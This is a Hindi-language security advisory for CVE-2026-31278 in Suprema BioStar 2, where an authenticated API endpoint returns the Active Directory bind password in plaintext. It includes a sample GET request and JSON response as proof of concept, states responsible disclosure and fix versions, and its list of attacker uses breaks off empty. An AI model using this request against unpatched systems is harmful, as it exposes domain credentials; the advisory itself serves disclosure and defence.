
Suprema BioStar 2 में Active Directory क्रेडेंशियल एक्सपोज़र भेद्यता के लिए CVE लेख
| फ़ील्ड | विवरण |
|---|---|
| CVE आईडी | CVE-2026-31278 |
| विक्रेता | Suprema Inc. |
| उत्पाद | BioStar 2 |
| भेद्यता प्रकार | संवेदनशील सूचना प्रकटीकरण / क्रेडेंशियल एक्सपोज़र |
| हमला वेक्टर | दूरस्थ / प्रमाणित / कम जटिलता |
| गंभीरता | उच्च |
| इसमें ठीक किया गया | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| शोधकर्ता | Abdullah Alannaz |
Suprema BioStar 2 में संवेदनशील जानकारी प्रकटीकरण भेद्यता मौजूद है, जो Active Directory एकीकरण सेटिंग्स के अनुचित प्रबंधन के कारण होती है। बैकएंड API एंडपॉइंट /api/v2/setting/adserversetting Active Directory बाइंड खाता क्रेडेंशियल्स को प्लेनटेक्स्ट में लौटाता है, भले ही प्रशासनिक UI में पासवर्ड मास्क किया गया हो।
यद्यपि प्रशासनिक इंटरफ़ेस में पासवर्ड फ़ील्ड मास्क किया जाता है, बैकएंड API को प्रमाणित अनुरोध पूरे अनएन्क्रिप्टेड पासवर्ड के साथ-साथ LDAP कॉन्फ़िगरेशन पैरामीटर (अक्षम SSL संचार सहित) प्रकट करते हैं।
एक प्रमाणित हमलावर AD सर्वर कॉन्फ़िगरेशन एंडपॉइंट पर HTTP GET अनुरोध भेजता है और सर्वर प्रतिक्रिया में Active Directory सेवा खाता पासवर्ड को प्लेनटेक्स्ट में प्राप्त करता है।
अनुरोध:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
प्रतिक्रिया:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
एक प्रमाणित हमलावर प्रकट किए गए क्रेडेंशियल्स का उपयोग निम्न कार्यों के लिए कर सकता है:
MITRE द्वारा CVE-2026-31278 निर्धारित | BioStar 2 v2.9.12 / BioStarX v1.0.2 में फिक्स जारी |
Abdullah Alannaz सुरक्षा शोधकर्ता
यह भेद्यता Suprema को जिम्मेदारीपूर्वक प्रकट की गई थी। विक्रेता ने समस्या की पुष्टि की और CVE निर्धारण के लिए MITRE के साथ समन्वय किया।